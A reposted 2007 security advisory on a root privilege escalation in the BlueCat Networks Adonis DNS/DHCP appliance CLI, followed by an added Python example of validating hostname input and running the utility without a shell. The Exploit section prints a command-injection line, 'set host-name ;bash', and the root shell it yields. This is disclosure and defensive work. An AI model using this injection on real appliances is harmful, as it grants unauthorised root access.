TS-2007-003-0.txt

17 Aug 2007 | Reported by forloop | Type: packetstorm | Source: packetstormsecurity.com

Template Security discovered root privilege escalation in BlueCat Networks Adonis CL

Code
`Template Security Security Advisory  
-----------------------------------  
  
BlueCat Networks Adonis CLI root privilege escalation  
  
Date: 2007-08-16  
Advisory ID: TS-2007-003-0  
Vendor: BlueCat Networks, http://www.bluecatnetworks.com/  
Revision: 0  
  
Contents  
--------  
  
Summary  
Software Version  
Details  
Impact  
Exploit  
Workarounds  
Obtaining Patched Software  
Credits  
Revision History  
  
Summary  
-------  
  
Template Security has discovered a root privilege escalation  
vulnerability in the BlueCat Networks Adonis DNS/DHCP appliance  
which allows the admin user to gain root privilege from the  
Command Line Interface (CLI).  
  
Software Version  
----------------  
  
Adonis version 5.0.2.8 was tested.  
  
Details  
-------  
  
The admin account on the Adonis DNS/DHCP appliance provides  
access to a CLI that allows an administrator to perform tasks  
such as setting the IP address, netmask, system time and system  
hostname. By entering a certain command sequence, the  
administrator is able to execute a command as root.  
  
Impact  
------  
  
Access to the admin account is the same as root access on the  
appliance.  
  
Exploit  
-------  
  
Here we use the 'set host-name' CLI command to execute a root  
shell:  
  
:adonis>set host-name ;bash  
adonis.katter.org  
root@adonis:~# id  
uid=0(root) gid=0(root) groups=0(root)  
  
NOTE: There may be other command sequences that accomplish the  
same result.  
  
Workarounds  
-----------  
  
Only provide admin account access to administrators that also  
have root account access on the appliance.  
  
Obtaining Patched Software  
--------------------------  
  
Contact the vendor.  
  
Credits  
-------  
  
forloop discovered this vulnerability while enjoying a Tuborg  
Gold. forloop is a member of Template Security.  
  
Revision History  
----------------  
  
2007-08-16: Revision 0 released  
  
  
`
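
The transcript in the Exploit section is consistent with the 'set host-name' argument reaching a root shell command line unfiltered; the advisory does not describe the CLI's implementation, so that is an assumption. The following is an added example, not code from the advisory or from the vendor, showing how a CLI handler can validate the argument against RFC 1123 and run the utility without a shell. The function names and the `/bin/hostname` path are hypothetical.

```python
import re
import subprocess

# One RFC 1123 label: letters, digits, hyphen; 1-63 chars; no edge hyphen.
_LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")

# Hypothetical path to the system utility; not taken from the advisory.
HOSTNAME_BIN = "/bin/hostname"


def unsafe_command_line(arg):
    """Assumed vulnerable pattern: the operator's text is pasted into a
    string that a root shell would interpret. Returned only, never run."""
    return "hostname " + arg


def is_valid_hostname(name):
    """Allow-list check: dot-separated RFC 1123 labels, 253 chars at most."""
    if not name or len(name) > 253:
        return False
    if name.endswith("."):          # tolerate one trailing root dot
        name = name[:-1]
    return all(_LABEL.fullmatch(label) for label in name.split("."))


def build_argv(arg):
    """Return the argv list for the change, or raise ValueError."""
    candidate = arg.strip()
    if not is_valid_hostname(candidate):
        raise ValueError("rejected host-name argument: %r" % candidate)
    return [HOSTNAME_BIN, candidate]


def set_hostname(arg, runner=subprocess.run):
    """Run the utility with an argv list and no shell, so separators
    such as ';' are never parsed as command syntax."""
    return runner(build_argv(arg), shell=False, check=True)


if __name__ == "__main__":
    # Constructed inputs: a normal name and the argument from the advisory.
    for sample in ("adonis.katter.org", ";bash"):
        print(repr(unsafe_command_line(sample)), is_valid_hostname(sample))
```

This covers a single command; since the advisory notes that other command sequences may give the same result, every CLI command that passes operator input to a privileged process needs the same allow-list and no-shell treatment.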
